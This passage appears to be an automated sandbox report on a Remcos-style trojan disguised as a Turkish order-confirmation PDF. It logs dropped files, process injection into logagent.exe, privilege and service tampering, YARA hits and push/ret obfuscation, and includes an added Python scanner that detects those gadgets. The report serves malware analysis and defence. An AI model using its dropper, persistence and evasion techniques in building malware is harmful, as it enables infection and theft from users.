Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait 3_2_0040D2A6
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1054F910 atoi,atoi,atoi,ExitWindowsEx,LoadLibraryA,GetProcAddress, 3_2_1054F910
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E9B05 0_3_036E9B05
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E1A14 0_3_036E1A14
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E19E8 0_3_036E19E8
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_038D3D3F 0_3_038D3D3F
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040D2A6 3_2_0040D2A6
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10541006 3_2_10541006
Source: C:\Windows\SysWOW64\logagent.exe Code function: String function: 00413E72 appears 49 times
Source: C:\Windows\SysWOW64\logagent.exe Code function: String function: 0041203B appears 31 times
Source: C:\Windows\SysWOW64\logagent.exe Code function: String function: 10555801 appears 49 times
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_105555CE NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA, 3_2_105555CE
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310969892.00000000022EA000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Eluiezilfw.exe.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Eluiezilfw.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: system.dll
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: ??.dll
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: archiveint.dll
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: mpclient.dll
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: endpointdlp.dll
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: ????.dll
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: ??l.dll
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: ??.dll
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: ?????????.dll
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: am.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: system.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: archiveint.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: mpclient.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??????.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: am.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: system.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: archiveint.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: mpclient.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??????.dll
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: endpointdlp.dll
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe ReversingLabs: Detection: 21%
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe File read: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe "C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe"
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: unknown Process created: C:\Users\Public\Libraries\Eluiezilfw.exe "C:\Users\Public\Libraries\Eluiezilfw.exe"
Source: unknown Process created: C:\Users\Public\Libraries\Eluiezilfw.exe "C:\Users\Public\Libraries\Eluiezilfw.exe"
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 3_2_0040EC0F
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1055059E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 3_2_1055059E
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Eluiezilfwmdrgrdfrqpnwmurrnwnhm[1]
Source: classification engine Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@9/5@19/5
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00411927 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 3_2_00411927
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00409A2F GetModuleFileNameW,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,CloseHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CloseHandle,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,wcslen,?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z,??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CreateMutexA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,CloseHandle,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 3_2_00409A2F
Source: C:\Windows\SysWOW64\logagent.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-MZPAVR
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00409D02 FindResourceA,LoadResource,LockResource,SizeofResource, 3_2_00409D02
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected

Data Obfuscation

Source: Yara match File source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, type: SAMPLE
Source: Yara match File source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Eluiezilfw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.Eluiezilfw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Eluiezilfw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.Eluiezilfw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.344209783.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.347399894.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.360030568.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.346405704.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.315120211.0000000003610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.306973875.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.326994994.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.316837700.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.349121751.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.309996740.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.317153227.000000007FDD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.312930120.0000000003050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.361029837.000000007FDD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.360948526.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.358808877.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.349277729.000000007FDD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.360296603.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.259960102.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\Public\Libraries\Eluiezilfw.exe, type: DROPPED
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E5FFF push 090D2120h; retf 0_3_036E60C9
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E5F96 push 090D2120h; retf 0_3_036E60C9
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E5E3E push 090D2120h; retf 0_3_036E60C9
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E580B push ebp; iretd 0_3_036E580C
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E581C push ebp; iretd 0_3_036E581D
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E54D6 push ebp; iretd 0_3_036E5510
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_038D2098 push edx; ret 0_3_038D20A0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0041BE7A push cs; ret 3_2_0041BE7B
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00413ED0 push eax; ret 3_2_00413EFE
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0041B326 push cs; ret 3_2_0041B327
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1055585F push eax; ret 3_2_1055588D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10541040 push ss; retf 3_2_10541002
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1055E44C push es; retf 3_2_1055E460
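The sandbox lines above flag "push X; ret", "push X; retf" and "push ebp; iretd" sequences: the pushed value becomes the new EIP when the return executes, so the pair is a jump that static call-graph tools do not follow. The following Python scanner, added here as an example and not part of the sandbox report or of the sample, locates those pairs in raw code bytes. Its opcode tables are standard 32-bit x86 encodings; the SAMPLE buffer is constructed for the example and does not come from the analysed binary. It is a byte-level heuristic with no instruction-length decoding beyond the push itself, so on a real section it should be run over code ranges only, and a disassembler-backed pass (capstone or similar) would be the next step.

```python
"""Find push/ret style control-flow obfuscation in raw x86 code bytes.

Added example for the "push ...; ret / retf / iretd" hits listed in the
sandbox report (e.g. 'push 090D2120h; retf', 'push ebp; iretd',
'push cs; ret'). Not part of the sandbox or of the sample; the SAMPLE
buffer below is constructed to exercise each reported shape.
"""
import struct
from dataclasses import dataclass
from typing import List, Optional

# One-byte push opcodes in 32-bit mode: general registers and segment registers.
PUSH_REG = {0x50 + i: r for i, r in enumerate(
    ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"))}
PUSH_SEG = {0x06: "es", 0x0E: "cs", 0x16: "ss", 0x1E: "ds"}
# Return-class opcodes: each pops the value the push just placed on the stack
# into EIP (retf also pops a CS selector, iretd additionally EFLAGS), which is
# what turns 'push X; ret' into a disguised jump.
RET_OPS = {0xC3: "ret", 0xC2: "ret imm16", 0xCB: "retf", 0xCA: "retf imm16", 0xCF: "iretd"}


@dataclass
class Hit:
    offset: int            # address of the push (base + buffer offset)
    push: str              # e.g. 'push 090D2120h'
    ret: str               # e.g. 'retf'
    target: Optional[int]  # pushed imm32, i.e. the destination of 'push imm32; ret'


def _decode_push(buf: bytes, i: int):
    """Return (mnemonic, length, immediate) if buf[i] starts a push, else None."""
    op = buf[i]
    if op in PUSH_REG:
        return f"push {PUSH_REG[op]}", 1, None
    if op in PUSH_SEG:
        return f"push {PUSH_SEG[op]}", 1, None
    if op == 0x68 and i + 5 <= len(buf):          # push imm32
        imm = struct.unpack_from("<I", buf, i + 1)[0]
        return f"push {imm:08X}h", 5, imm
    if op == 0x6A and i + 2 <= len(buf):          # push imm8 (sign-extended)
        return f"push {buf[i + 1]:02X}h", 2, buf[i + 1]
    return None


def find_push_ret(buf: bytes, base: int = 0, window: int = 1) -> List[Hit]:
    """Report every push followed by a ret-class opcode within `window` bytes.

    window=1 demands that the ret immediately follows the push (tightest form,
    fewest false positives). A larger window also catches the padded variants
    the sandbox reports, where the ret sits some bytes after the push, at the
    price of more noise when the buffer holds data rather than code.
    """
    hits: List[Hit] = []
    i, n = 0, len(buf)
    while i < n:
        dec = _decode_push(buf, i)
        if dec is None:
            i += 1
            continue
        mnem, length, imm = dec
        for j in range(i + length, min(n, i + length + window)):
            if buf[j] in RET_OPS:
                hits.append(Hit(base + i, mnem, RET_OPS[buf[j]], imm if length == 5 else None))
                break
        i += length          # never re-decode the immediate bytes as opcodes
    return hits


def format_hits(hits: List[Hit]) -> List[str]:
    """Render hits in the same 'push X; ret' shape the sandbox uses."""
    return [f"{h.offset:08X} {h.push}; {h.ret}" for h in hits]


# Constructed buffer: a benign prologue, then each gadget shape from the report.
SAMPLE = bytes([
    0x55, 0x8B, 0xEC,                    # push ebp; mov ebp, esp   (benign prologue)
    0x68, 0x20, 0x21, 0x0D, 0x09, 0xCB,  # push 090D2120h; retf
    0x90, 0x90,                          # nop; nop
    0x55, 0xCF,                          # push ebp; iretd
    0x0E, 0xC3,                          # push cs; ret
    0x52, 0xC3,                          # push edx; ret
    0x16, 0xCB,                          # push ss; retf
    0x06, 0xCB,                          # push es; retf
    0x50, 0x90, 0x90, 0xC3,              # push eax; nop; nop; ret  (needs window >= 3)
])

if __name__ == "__main__":
    for line in format_hits(find_push_ret(SAMPLE, base=0x036E5F00, window=3)):
        print(line)
```

With the default window the benign `push ebp; mov ebp, esp` prologue is ignored and six gadgets are reported; widening the window to 3 adds the padded `push eax; nop; nop; ret` case. The reported `push 090D2120h; retf` illustrates why `retf` and `iretd` hits are worth separate attention: a far return also pops a CS selector, so a single push followed by `retf` is not a usable branch and usually marks junk code inserted to break disassembly rather than a real transfer.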
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress, 3_2_00409908
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe File created: C:\Users\Public\Libraries\Eluiezilfw.exe Jump to dropped file
